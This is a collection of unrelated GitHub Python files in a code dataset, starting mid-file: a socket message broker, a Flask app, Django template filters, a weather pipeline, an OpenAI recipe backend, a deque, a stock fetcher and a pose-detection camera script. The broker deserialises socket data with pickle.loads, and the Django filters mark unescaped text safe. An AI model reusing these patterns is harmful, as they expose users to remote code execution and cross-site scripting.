byteMessage = messageSize.to_bytes(2, 'big');\n connection.send(serialize + byteMessage + messageToSend)\n\n @classmethod\n def recv_msg(cls, connection: socket):\n #Receives through a connection a Message object.\n\n messageSize = int.from_bytes(connection.recv(2), 'big')\n \n if messageSize == 0:\n return\n\n try:\n data = connection.recv(messageSize)\n return pickle.loads(data)\n except:\n raise 
CDProtoBadFormat(data)","repo_name":"fungame2270/Message_broker","sub_path":"src/protocols/pickle_protocol.py","file_name":"pickle_protocol.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29516383654","text":"from flask import Flask,redirect,url_for,request,render_template\n\nimport pandas as pd\n\n\napp=Flask(__name__)\n\n@app.route('/newbill',methods=['POST','GET'])\ndef login():\n if request.method=='POST':\n user=request.form['nm']\n price=request.form['price']\n dict1={'item':[user],'price':[price]}\n df=pd.read_csv(r\"items.csv\",index_col=0)\n ind = df.tail(1).index\n df.loc[ind[0] + 1] = [user,price]\n print(df)\n df.to_csv('/Users/rekha/Documents/items.csv')\n return (render_template('user.html', name=user))\n else:\n user=request.args.get('nm')\n return redirect(url_for('success',name=user))\nif __name__=='__main__':\n app.run(debug=True)\n","repo_name":"rekha75s/flasky","sub_path":"csvread.py","file_name":"csvread.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6388826295","text":"from django import template\nfrom re import IGNORECASE, compile, escape as rescape\nfrom django.utils.safestring import mark_safe\n\n\nregister = template.Library()\n\n@register.filter(name='highlight')\ndef highlight(text, search):\n rgx = compile(rescape(search), IGNORECASE)\n return mark_safe(\n rgx.sub(\n lambda m: '{}'.format(m.group()),\n text\n )\n )\n\n@register.filter(name='underline')\ndef underline(text, search):\n rgx = compile(rescape(search), IGNORECASE)\n return mark_safe(\n rgx.sub(\n lambda m: '{}'.format(m.group()),\n text\n )\n )\n","repo_name":"django-daiquiri/daiquiri","sub_path":"daiquiri/files/templatetags/search_highlight.py","file_name":"search_highlight.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"10161782475","text":"import logging\nimport csv\nimport multiprocessing\nimport threading\nimport pandas as pd\nimport operator\nfrom queue import Queue, Empty\nfrom pprint import pformat\nfrom pathlib import Path\nfrom multiprocessing.pool import ThreadPool\nimport itertools\n\nfrom tasks import (\n DataFetchingTask,\n DataCalculationTask,\n DataAggregationTask,\n DataAnalyzingTask,\n)\nfrom utils import CITIES\nfrom settings import (\n RESULT_PATH,\n RESP_PATH,\n CALC_PATH,\n ANALYZED_PATH,\n DATA_FETCH_NUM_THREADS,\n CALC_NUM_PROCESSES,\n ANALYZE_NUM_PROCESSES,\n)\n\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(\n handlers=[logging.FileHandler(filename='app.log', mode='w')],\n level=logging.DEBUG,\n format='%(process)d: %(asctime)s: %(levelname)s - %(message)s'\n)\n\n\nclass NotEnoughData(Exception):\n pass\n\ndef create_folders():\n Path(RESP_PATH).mkdir(parents=True, exist_ok=True)\n Path(CALC_PATH).mkdir(parents=True, exist_ok=True)\n Path(ANALYZED_PATH).mkdir(parents=True, exist_ok=True)\n\ndef rank_analyzed_data(data: list):\n \n data = list(itertools.filterfalse(lambda item: not item , data))\n if data.__len__() < 1:\n message = 'Not enough data to form a rating!'\n logger.error(message)\n raise NotEnoughData(message)\n \n data = sorted(data, key=operator.itemgetter('relevant_cond_hours'), reverse=True)\n data = sorted(data, key=operator.itemgetter('temp_avg'), reverse=True) \n\n rank = 1\n data[0]['rank'] = rank\n for i in range(1, 
data.__len__()):\n if data[i-1]['temp_avg'] != data[i]['temp_avg'] or data[i-1]['relevant_cond_hours'] != data[i]['relevant_cond_hours']:\n rank += 1\n data[i]['rank'] = rank\n\n logger.debug('Ranked list created:')\n logger.debug(pformat(data))\n\n return data\n\ndef forecast_weather(cities: dict, result_path = RESULT_PATH):\n \"\"\"\n Анализ погодных условий по городам\n \"\"\"\n\n create_folders()\n\n fetchQueue = Queue()\n calcQueue = multiprocessing.Queue()\n analyzeQueue = multiprocessing.Queue()\n aggregationQueue = multiprocessing.Queue()\n\n [fetchQueue.put((city, url)) for city, url in cities.items()]\n\n fetchThreads = []\n for _ in range(DATA_FETCH_NUM_THREADS):\n thread = DataFetchingTask(calcQueue, fetchQueue, RESP_PATH)\n fetchThreads.append(thread)\n thread.start()\n\n for thread in fetchThreads:\n thread.join()\n\n calcProcesses = []\n for _ in range(CALC_NUM_PROCESSES):\n process = DataCalculationTask(calcQueue, analyzeQueue, CALC_PATH)\n calcProcesses.append(process)\n process.start()\n \n for proc in calcProcesses:\n proc.join()\n\n toAnalyze = []\n while True:\n try:\n (city, path) = analyzeQueue.get(timeout=0.01)\n toAnalyze.append((city, path, ANALYZED_PATH))\n\n except Empty:\n logger.debug('Main: analyzeQueue empty!')\n break\n \n ordered = []\n with multiprocessing.Pool(ANALYZE_NUM_PROCESSES) as pool:\n result = pool.starmap_async(DataAnalyzingTask.run, toAnalyze)\n ordered = result.get()\n\n logger.debug('DataAnalyzingTask: Thread ended.')\n\n ordered = rank_analyzed_data(ordered)\n\n result_lock = threading.Lock()\n items = [(item['path'], item['rank'], result_lock, result_path) for item in ordered]\n \n with open(ordered[0]['path'], 'r') as csvFile:\n reader = csv.reader(csvFile)\n cols = ','.join(next(reader)) + ',Рейтинг\\n'\n \n with open(result_path, newline='', mode='w') as f:\n f.write(cols)\n \n with ThreadPool() as pool:\n for _ in pool.starmap(DataAggregationTask.run, items):\n logger.debug('Thread ended.')\n\n logger.info(f'Город-победитель: {ordered[0][\"city\"]}')\n\n\nif __name__ == \"__main__\":\n forecast_weather(CITIES)\n","repo_name":"angr1it/async-python-sprint-1","sub_path":"forecasting.py","file_name":"forecasting.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30155912326","text":"import json\nimport openai\nimport sqlite3\nimport random\nimport requests\nimport logging\n\nfrom customError import CustomError\n\nRECIPES_PER_REQUEST = 5\nIMAGE_DIR = '/Users/andylegrand/xcode/gptfood/Backend/tests/images/'\n\ndebug = True # if set to true the backend will not call the openai api and will instead return example responses\n\nerrorCodes = json.loads(open('errorCodes.json', 'r').read())\n\ndef genRecipesApiCall(ingredients, usedRecipes, proomptPath='proomps/genRecipeList.txt'):\n \"\"\"\n Calls openai api to generate recipes given ingredients.\n @param ingredients: list of ingredients representing available ingredients\n @param usedRecipes: list of recipes representing recipes that have already been used\n @raise CustomError: if the response from the api is not valid json\n @return: extracted text from response\n \"\"\"\n\n # Form list of ingredients in string form\n ingredient_string = ''\n for ingredient in ingredients:\n ingredient_string += ingredient + '\\n'\n\n # Form list of used recipes in string form\n used_recipe_string = ''\n for recipe in usedRecipes:\n used_recipe_string += '{' + recipe + '}\\n'\n\n # Form proompt\n proompt = 
open(proomptPath, 'r').read()\n proompt = proompt.replace('[ingredients]', ingredient_string)\n proompt = proompt.replace('[used]', used_recipe_string)\n\n # Call openai api\n openai.api_key = open('/Users/andylegrand/xcode/gptfood/Backend/key.txt', 'r').read()\n logging.debug(\"key: \" + openai.api_key)\n\n try:\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=proompt,\n temperature=1,\n max_tokens=1024,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n assert response.choices[0].text != None\n \n logging.debug(f\"APIResponse: {response.choices[0].text}\")\n\n return response.choices[0].text\n except:\n raise CustomError(proompt, errorCodes[\"GPT_API_ERROR\"])\n \ndef addRecipeToDatabase(recipe, ingredients, connection):\n \"\"\"\n Adds a list of recipes to the database.\n @param recipes: string representing the recipe\n @param ingredients: list of strings representing the ingredients\n @param connection: connection to the database\n @return: None\n \"\"\"\n cursor = connection.cursor()\n\n # Add the recipe to the database\n cursor.execute(\"\"\"\n INSERT INTO recipes (name, directions, imagePath) VALUES (?, NULL, NULL);\n \"\"\", (recipe,))\n recipeId = cursor.lastrowid\n\n # Add the ingredients to the database\n ingredientIds = []\n for ingredient in ingredients:\n cursor.execute(\"\"\"\n INSERT OR IGNORE INTO ingredients (name) VALUES (?);\n \"\"\", (ingredient,))\n ingredientIds.append(cursor.lastrowid)\n\n # Add the relations to the database\n for ingredientId in ingredientIds:\n cursor.execute(\"\"\"\n INSERT INTO relations (recipe_id, ingredient_id) VALUES (?, ?);\n \"\"\", (recipeId, ingredientId))\n \n connection.commit()\n\ndef generateAndAddRecipes(ingredients, usedRecipes, connection):\n \"\"\"\n Generates recipes and adds them to the database.\n @param ingredients: list of ingredients representing available ingredients\n @param usedRecipes: list of recipes representing recipes that have already been used\n @param connection: connection to the database\n @raise CustomError: if the response from the api is not valid json\n @return: None\n \"\"\"\n completionText = None\n if not debug:\n completionText = genRecipesApiCall(ingredients, usedRecipes)\n else:\n completionText = open('sampleresponse.txt', 'r').read()\n \n # Load the text as JSON, abort and throw an error if it fails\n try:\n recipes = json.loads(completionText)\n except:\n raise CustomError(f\"Error parsing JSON: {completionText}\", errorCodes[\"JSON_PARSE_ERROR\"])\n\n\n for recipe in recipes:\n addRecipeToDatabase(recipe[\"name\"], recipe[\"ingredients\"], connection)\n\ndef queryDatabaseRecipes(ingredients, usedRecipes, connection):\n cursor = connection.cursor()\n\n # Fetch all recipe names from the database, then randomize the order\n cursor.execute('SELECT name FROM recipes')\n all_recipes = [row[0] for row in cursor.fetchall()]\n random.shuffle(all_recipes)\n\n # Fetch corresponding ingredient ids from the database\n placeholders = ', '.join('?' 
for ingredient in ingredients)\n cursor.execute(f\"SELECT id FROM ingredients WHERE name IN ({placeholders})\", ingredients)\n ingredient_ids = set(row[0] for row in cursor.fetchall())\n\n # Find the recipes whose ingredients are all in the provided list\n matching_recipes = []\n for recipe in all_recipes:\n if recipe in usedRecipes:\n continue\n\n # Fetch the ingredients for this recipe from relations\n cursor.execute('''\n SELECT ingredient_id\n FROM relations\n JOIN recipes ON relations.recipe_id = recipes.id\n WHERE recipes.name = ?\n ''', (recipe,))\n recipe_ingredient_ids = set(row[0] for row in cursor.fetchall())\n\n # Loop through the ingredients and check if they are all in the provided list. If so, add the recipe to matching_recipes\n if recipe_ingredient_ids.issubset(ingredient_ids):\n matching_recipes.append(recipe)\n\n if len(matching_recipes) == RECIPES_PER_REQUEST:\n break\n\n return matching_recipes\n\ndef getRecipes(ingredients, usedRecipes, databasePath):\n if debug:\n return [\"Recipe 1\", \"Recipe 2\", \"Recipe 3\", \"Recipe 4\", \"Recipe 5\"]\n\n # Connect to the database\n conn = sqlite3.connect(databasePath)\n\n # Query database. If there are not enough recipes to fufill the request generate more and try again\n recipes = queryDatabaseRecipes(ingredients, usedRecipes, conn)\n \n if len(recipes) < RECIPES_PER_REQUEST:\n generateAndAddRecipes(ingredients, usedRecipes, conn)\n recipes = queryDatabaseRecipes(ingredients, usedRecipes, conn)\n \n conn.close()\n return recipes\n\ndef genDirectionsApiCall(recipe, ingredients):\n \"\"\"\n Calls openai api to generate directions given a recipe.\n @param recipe: string representing the recipe\n @return: text response from openai\n \"\"\"\n\n # Form list of ingredients in string form\n ingredient_string = ''\n for ingredient in ingredients:\n ingredient_string += ingredient + '\\n'\n\n # Form proompt\n proompt = open('proomps/genDirections.txt', 'r').read()\n proompt = proompt.replace('[recipe]', recipe)\n proompt = proompt.replace('[ingredients]', ingredient_string)\n\n # Call openai api\n openai.api_key = open('key.txt', 'r').read()\n\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=proompt,\n temperature=1,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n return response.choices[0].text\n\ndef downloadImage(url, path):\n \"\"\"\n Downloads an image from a url and saves it to a path.\n @param url: url of the image\n @param path: path to save the image to\n @return: None\n \"\"\"\n response = requests.get(url, stream=True)\n if response.status_code == 200:\n with open(path, 'wb') as f:\n f.write(response.content)\n\ndef genImageApiCall(description):\n \"\"\"\n Calls openai api to generate an image given a description.\n @param description: string representing the description\n @return: url of the generated image\n \"\"\"\n openai.api_key = open('key.txt', 'r').read()\n\n response = openai.Image.create(\n prompt=description,\n n=1,\n size=\"256x256\"\n )\n image_url = response['data'][0]['url']\n return image_url\n\ndef addDirectionsToDatabase(recipe, directions, imagePath, connection):\n \"\"\"\n Adds directions and image path to the database.\n @param recipe: string representing the recipe\n @param directions: string representing the directions\n @param imagePath: string representing the path to the image\n @param connection: connection to the database\n @return: None\n \"\"\"\n\n cursor = connection.cursor()\n\n # Add directions and image path to database\n 
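    # The \"?\" placeholders below are filled in by sqlite3 parameter binding,
    # so directions, imagePath and recipe are passed as data rather than being
    # formatted into the SQL text.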
cursor.execute(\"\"\"\n UPDATE recipes SET directions = ?, imagePath = ? WHERE name = ?;\n \"\"\", (directions, imagePath, recipe))\n\n connection.commit()\n\n\ndef generateAndAddDirections(recipe, connection, imagePath):\n \"\"\"\n Generates directions and adds them to the database.\n @param recipe: string representing the recipe\n @param connection: connection to the database\n @return: None\n \"\"\"\n\n # Get ingredients from database\n cursor = connection.cursor()\n\n # get recipe id\n cursor.execute('SELECT id FROM recipes WHERE name = ?', (recipe,))\n\n if cursor.fetchone() == None:\n raise CustomError(f\"Recipe {recipe} not found in database\", errorCodes[\"RECIPE_NOT_FOUND\"])\n\n # get ingredients\n cursor.execute('''\n SELECT ingredients.name\n FROM ingredients\n JOIN relations ON ingredients.id = relations.ingredient_id\n JOIN recipes ON relations.recipe_id = recipes.id\n WHERE recipes.name = ?\n ''', (recipe,))\n ingredients = [row[0] for row in cursor.fetchall()]\n\n logging.debug(f\"Ingredients: {ingredients}\")\n\n # Add the directions to the database\n res = genDirectionsApiCall(recipe, ingredients)\n\n # Convert to json, extract directions and image proompt. Abort and throw an error if it fails\n try:\n js = json.loads(res)\n directions = js[\"directions\"]\n imageProompt = js[\"dall-e prompt\"]\n except:\n raise CustomError(f\"Error parsing JSON: {res}\", errorCodes[\"JSON_PARSE_ERROR\"])\n\n # Generate image\n imageUrl = genImageApiCall(imageProompt)\n imagePath = imagePath + recipe + '.png'\n downloadImage(imageUrl, imagePath)\n\n # Add directions and image path to database\n addDirectionsToDatabase(recipe, directions, imagePath, connection)\n\ndef getDirections(recipe, databasePath):\n \"\"\"\n Query database. If the current recipe does not have directions generate them and try again\n @param recipe: string representing the recipe\n @param databasePath: path to the database\n @return: directions for the recipe\n \"\"\"\n if debug:\n return \"Directions for \" + recipe\n\n # Connect to the database\n conn = sqlite3.connect(databasePath)\n cursor = conn.cursor()\n\n # Check if recipe has directions\n cursor.execute('SELECT directions FROM recipes WHERE name = ?', (recipe,))\n directions = cursor.fetchone()[0]\n\n if directions == None:\n generateAndAddDirections(recipe, conn, IMAGE_DIR)\n cursor.execute('SELECT directions FROM recipes WHERE name = ?', (recipe,))\n directions = cursor.fetchone()[0]\n\n conn.close()\n return directions\n\n\ndef getImage(recipe, databasePath):\n \"\"\"\n Returns path to the image for the recipe. 
This function should be called after getDirections, so the image should already be generated.\n @param recipe: string representing the recipe\n @param databasePath: path to the database\n @return: path to the image\n \"\"\"\n if debug:\n return \"/Users/andylegrand/xcode/gptfood/Backend/exampleResponses/exampleImage.png\"\n\n # Connect to the database\n conn = sqlite3.connect(databasePath)\n cursor = conn.cursor()\n\n # Check if recipe has directions\n cursor.execute('SELECT imagePath FROM recipes WHERE name = ?', (recipe,))\n imagePath = cursor.fetchone()[0]\n if imagePath == None:\n raise CustomError(f\"Image for {recipe} not found in database\", errorCodes[\"IMAGE_NOT_FOUND\"])\n\n conn.close()\n return imagePath\n","repo_name":"andyllegrand/gptfood","sub_path":"Backend/requestHandler.py","file_name":"requestHandler.py","file_ext":"py","file_size_in_byte":11138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20196886822","text":"class Node:\n def __init__(self, value: int = 0, prev=None, next=None):\n self.value = value\n self.prev = prev\n self.next = next\n\n\nclass MyCircularDeque:\n def __init__(self, k: int):\n self.k = k\n self.count = 0\n self.head = None\n self.tail = None\n\n def insertFront(self, value: int) -> bool:\n if self.isFull():\n return False\n if not self.head:\n self.head = Node(value)\n self.tail = self.head\n self.count += 1\n return True\n prev_head = self.head\n self.head = Node(value, next=prev_head)\n prev_head.prev = self.head\n self.count += 1\n return True\n\n def insertLast(self, value: int) -> bool:\n if self.isFull():\n return False\n if not self.head:\n self.head = Node(value)\n self.tail = self.head\n self.count += 1\n return True\n self.tail.next = Node(value, self.tail)\n self.tail = self.tail.next\n self.count += 1\n return True\n\n def deleteFront(self) -> bool:\n if not self.head:\n return False\n self.head = self.head.next\n if self.head:\n self.head.prev = None\n self.count -= 1\n return True\n\n def deleteLast(self) -> bool:\n if not self.head:\n return False\n self.tail = self.tail.prev\n if self.tail:\n self.tail.next = None\n else:\n self.head = None\n self.count -= 1\n return True\n\n def getFront(self) -> int:\n if not self.head:\n return -1\n return self.head.value\n\n def getRear(self) -> int:\n if not self.head:\n return -1\n return self.tail.value\n\n def isEmpty(self) -> bool:\n return self.count == 0\n\n def isFull(self) -> bool:\n return self.count == self.k\n","repo_name":"miruts-xz/competitive-programming","sub_path":"weeks/week-2/day-7/design_circular_deque.py","file_name":"design_circular_deque.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13024329839","text":"from mo.front.extractor import FrontExtractorOp\nfrom mo.ops.eltwise_ninputs_in_1 import EltwiseNin1\nfrom mo.front.kaldi.utils import read_token_value\n\n\nclass ElementwiseProductComponentFrontExtractor(FrontExtractorOp):\n op = 'elementwiseproductcomponent'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n pb = node.parameters\n\n indim = read_token_value(pb, b'')\n outdim = read_token_value(pb, b'')\n num_inputs = indim / outdim\n\n attrs = {'num_inputs': int(num_inputs),\n 'operation': 'mul'}\n\n EltwiseNin1.update_node_stat(node, attrs)\n return 
cls.enabled\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/mo/front/kaldi/extractors/elementwise_component_ext.py","file_name":"elementwise_component_ext.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"72521048106","text":"#########################################################################################################################\n# IMPORT STATEMENTS\n#########################################################################################################################\n\n# for reading in configurations and paths\nimport logging\n## FIXME: stockretriever needs to be rewritten to be compatible with python3\n# import configparser\nimport os\nimport ntpath\n\n# library for retrieving stocks via yql from yahoo finance\nimport stockretriever as stocks\n\n# for writing stock data\nimport csv\nimport sys\n\nimport pprint\nimport multiprocessing\nimport time\n#########################################################################################################################\n# CONFIGURATIONS\n#########################################################################################################################\n\n# Setup for Logging, Global Variable Definitions, \n# logging.basicConfig(filename='etl/LocationCounter.log',level=logging.INFO,format='%(asctime)s %(levelname)s: %(message)s')\n# config = configparser.ConfigParser()\n# config.read(os.path.join(os.path.abspath(os.path.dirname(__file__)),\"../\",\"crawlers/\",\"newscrawler.conf\"))\nrun_path = os.path.abspath(os.path.dirname(__file__))\nlogging.basicConfig(filename='yahooFinance.log',level=logging.INFO,format='%(asctime)s %(levelname)s: %(message)s')\n\noutput_path = run_path +\"/stockdata/\"\noutput_file = output_path + 'stockdata.csv'\nnasdaq_file = run_path + \"/nasdaq_list.csv\"\n\n# Setup CSV File for Writing Stocks\n# Functions for output file formatting\ndef writeStockdataHeader(output_file):\n\tif not os.path.exists(output_path):\n\t\tos.makedirs(output_path)\n\n\tif os.path.isfile(output_file):\n\t\tos.remove(output_file)\n\t''' Write Header to the Stock Price Output File '''\n\twith open(output_file, 'w') as csvfile:\n\t\tarticleWriter = csv.writer(csvfile, delimiter='~',quoting=csv.QUOTE_ALL)\n\t\tarticleWriter.writerow([\"Symbol\",\"Date\",\"High\",\"Low\",\"Close\",\"AdjClose\",\"Open\",\"Volume\"])\n\t\n\treturn\n\ndef writeStockdataRow(output_file, symbol,date,high,low,close,adjclose,opn,volume):\n\t''' Logic for writing a stock date row, needs to be moved to a single threaded function '''\n\t\n\t# csv_start = time.time()\n\tlogging.debug(\"Metadata path is {}\".format(output_file))\n\n\t#Write metadata and reference to full text file name to csv separated by ~ character\n\twith open(output_file, 'a') as csvfile:\n\t\tWriter = csv.writer(csvfile, delimiter='~',quoting=csv.QUOTE_ALL)\n\t\tWriter.writerow([symbol,date,high,low,close,adjclose,opn,volume])\n\t# logging.debug(\"CSV write completed to {} in {} seconds\".format(output_file,time.time()- csv_start))\n\t\n\treturn\n\ndef readNasdaqList():\n\t''' Pulls names of NASDAQ tickers into an array from CSV file '''\n\n\ttickers = []\n\twith open(nasdaq_file, 'r') as csvfile:\n\t\tcsvReader = csv.reader(csvfile, delimiter=',')\n\t\tnext(csvReader)\n\t\tfor row in csvReader:\n\t\t\ttickers.append(row[0])\n\n\treturn tickers\n\n# Get current stock information - returns most of \n# the information on a typical Yahoo! 
Finance stock page\n# info = stocks.get_current_info([\"YHOO\",\"AAPL\",\"GOOG\",\"MSFT\"])\n# print info\n\n# Get current stock news - returns the RSS feed for\n# the given ticker in JSON format\n# news = stocks.get_news_feed('YHOO')\n\n# Get historical prices - returns all historical\n# open/low/high/close/volumn for thie given ticker\n\n\n\ndef processStockData(ticker):\n\t\n\tstock_data = fetchStockData(ticker)\n\tparseStockData(stock_data)\n\ndef fetchStockData(ticker):\n\tstock_data = {}\n\n\ttry:\n\t\tprint(\"Fetching for:\" + ticker)\n\t\tstock_data[ticker] = stocks.get_historical_info(ticker)\n\t\t# pprint.pprint(stock_data[ticker])\n\t\t\n\texcept KeyError:\n\t\tprint(\"Key not found:\" + ticker) \n\texcept stocks.NoResultsError:\n\t\tprint(\"No Results found for:\" + ticker)\n\n\treturn stock_data\n\ndef parseStockData(stock_data):\n\tfor ticker in stock_data:\n\t\tfor date in stock_data[ticker]:\n\t\t\tprint(\"Writing for\" + ticker, date['Date'])\n\t\t\twriteStockdataRow(output_file, ticker,\n\t\t\t\tdate[\"Date\"], \n\t\t\t\tdate[\"High\"], \n\t\t\t\tdate[\"Low\"], \n\t\t\t\tdate[\"Close\"], \n\t\t\t\tdate[\"AdjClose\"], \n\t\t\t\tdate[\"Open\"], \n\t\t\t\tdate[\"Volume\"])\n\ndef main():\n\ttickers = readNasdaqList()\n\t\n\twriteStockdataHeader(output_file)\n\t\n\tpool = multiprocessing.Pool()\n\tpool.map(processStockData,tickers)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"dviator/dsforthepeople","sub_path":"stocks/fetch_nasdaq_history.py","file_name":"fetch_nasdaq_history.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4918517865","text":"import mediapipe as mp # Import mediapipe\nimport cv2 # Import opencv\nimport time\nimport os\nimport datetime\nfrom threading import Thread\nfrom queue import Queue\nimport csv\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score # Accuracy metrics \nimport pickle\n\nmp_drawing = mp.solutions.drawing_utils # Drawing helpers\nmp_holistic = mp.solutions.holistic # Mediapipe Solutions\n\nwith open('body_language.pkl', 'rb') as f:\n model = pickle.load(f)\n \nuser = open('user.txt',\"r\")\nuser=user.read()\n\nclass Camera:\n def __init__(self, mirror=False):\n self.data = None\n self.cam = cv2.VideoCapture(0)\n\n self.WIDTH = 640\n self.HEIGHT = 480\n\n self.center_x = self.WIDTH / 2\n self.center_y = self.HEIGHT / 2\n self.touched_zoom = False\n self.image_queue = Queue()\n self.video_queue = Queue()\n\n self.scale = 1\n self.__setup()\n\n self.mirror = mirror\n\n def __setup(self):\n self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, self.WIDTH)\n self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, self.HEIGHT)\n time.sleep(2)\n\n def get_location(self, x, y):\n self.center_x = x\n self.center_y = y\n self.touched_zoom = True\n\n def stream(self):\n\n def streaming():\n\n self.ret = True\n while self.ret:\n self.ret, np_image = self.cam.read()\n if np_image is None:\n continue\n if self.mirror:\n\n np_image = cv2.flip(np_image, 1)\n if self.touched_zoom:\n np_image = self.__zoom(np_image, (self.center_x, self.center_y))\n else:\n if not self.scale == 1:\n np_image = self.__zoom(np_image)\n self.data = np_image\n k = cv2.waitKey(1)\n if k == ord('q'):\n self.release()\n break\n\n Thread(target=streaming).start()\n\n def __zoom(self, img, center=None):\n\n height, width = img.shape[:2]\n if center is None:\n\n center_x = int(width / 2)\n center_y = 
int(height / 2)\n radius_x, radius_y = int(width / 2), int(height / 2)\n else:\n\n rate = height / width\n center_x, center_y = center\n\n\n if center_x < width * (1-rate):\n center_x = width * (1-rate)\n elif center_x > width * rate:\n center_x = width * rate\n if center_y < height * (1-rate):\n center_y = height * (1-rate)\n elif center_y > height * rate:\n center_y = height * rate\n\n center_x, center_y = int(center_x), int(center_y)\n left_x, right_x = center_x, int(width - center_x)\n up_y, down_y = int(height - center_y), center_y\n radius_x = min(left_x, right_x)\n radius_y = min(up_y, down_y)\n\n\n radius_x, radius_y = int(self.scale * radius_x), int(self.scale * radius_y)\n\n\n min_x, max_x = center_x - radius_x, center_x + radius_x\n min_y, max_y = center_y - radius_y, center_y + radius_y\n\n\n cropped = img[min_y:max_y, min_x:max_x]\n\n new_cropped = cv2.resize(cropped, (width, height))\n\n return new_cropped\n\n def zoom_out(self):\n # scale 값을 조정하여 zoom-out\n if self.scale < 1:\n self.scale += 0.4\n if self.scale == 1:\n self.center_x = self.WIDTH\n self.center_y = self.HEIGHT\n self.touched_zoom = False\n\n def zoom_in(self):\n\n if self.scale > 0.2:\n self.scale -= 0.4\n def save_picture(self):\n\n ret, img = self.cam.read()\n if ret:\n now = datetime.datetime.now()\n date = now.strftime('%Y%m%d')\n hour = now.strftime('%H%M%S')\n user_id = '00001'\n filename = './images/cvui_{}_{}_{}.png'.format(date, hour, user_id)\n cv2.imwrite(filename, img)\n self.image_queue.put_nowait(filename)\n\n def show(self):\n with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n while self.cam.isOpened():\n self.ret,frame = self.cam.read()\n frame = self.data\n \n # Recolor Feed\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False \n\n # Make Detections\n results = holistic.process(image)\n image.flags.writeable = True \n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # 1. Draw face landmarks\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_TESSELATION, \n mp_drawing.DrawingSpec(color=(80,110,10), thickness=1, circle_radius=1),\n mp_drawing.DrawingSpec(color=(80,256,121), thickness=1, circle_radius=1)\n )\n\n # 2. Right hand\n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(80,22,10), thickness=2, circle_radius=4),\n mp_drawing.DrawingSpec(color=(80,44,121), thickness=2, circle_radius=2)\n )\n\n # 3. Left Hand\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(121,22,76), thickness=2, circle_radius=4),\n mp_drawing.DrawingSpec(color=(121,44,250), thickness=2, circle_radius=2)\n )\n\n # 4. 
Pose Detections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(245,117,66), thickness=2, circle_radius=4),\n mp_drawing.DrawingSpec(color=(245,66,230), thickness=2, circle_radius=2)\n )\n # Export coordinates\n try:\n # Extract Pose landmarks\n pose = results.pose_landmarks.landmark\n pose_row = list(np.array([[landmark.x, landmark.y, landmark.z, landmark.visibility] for landmark in pose]).flatten())\n\n # Extract Face landmarks\n face = results.face_landmarks.landmark\n face_row = list(np.array([[landmark.x, landmark.y, landmark.z, landmark.visibility] for landmark in face]).flatten())\n\n # Concate rows\n row = pose_row+face_row\n\n\n # Make Detections\n X = pd.DataFrame([row])\n body_language_class = model.predict(X)[0]\n body_language_prob = model.predict_proba(X)[0]\n body_language_class_list = body_language_class.split() \n print(body_language_class, body_language_prob)\n\n # Grab ear coords\n coords = tuple(np.multiply(\n np.array(\n (results.pose_landmarks.landmark[mp_holistic.PoseLandmark.LEFT_EAR].x, \n results.pose_landmarks.landmark[mp_holistic.PoseLandmark.LEFT_EAR].y))\n , [640,480]).astype(int))\n\n cv2.rectangle(image, \n (coords[0], coords[1]+5), \n (coords[0]+len(body_language_class)*20, coords[1]-30), \n (245, 117, 16), -1)\n cv2.putText(image, body_language_class, coords, \n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n # Get status box\n cv2.rectangle(image, (0,0), (250, 60), (245, 117, 16), -1)\n\n # Display Class\n cv2.putText(image, 'CLASS'\n , (95,12), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1, cv2.LINE_AA)\n cv2.putText(image, body_language_class.split(' ')[0]\n , (90,40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n # Display Probability\n cv2.putText(image, 'PROB'\n , (15,12), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1, cv2.LINE_AA)\n cv2.putText(image, str(round(body_language_prob[np.argmax(body_language_prob)],2))\n , (10,40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 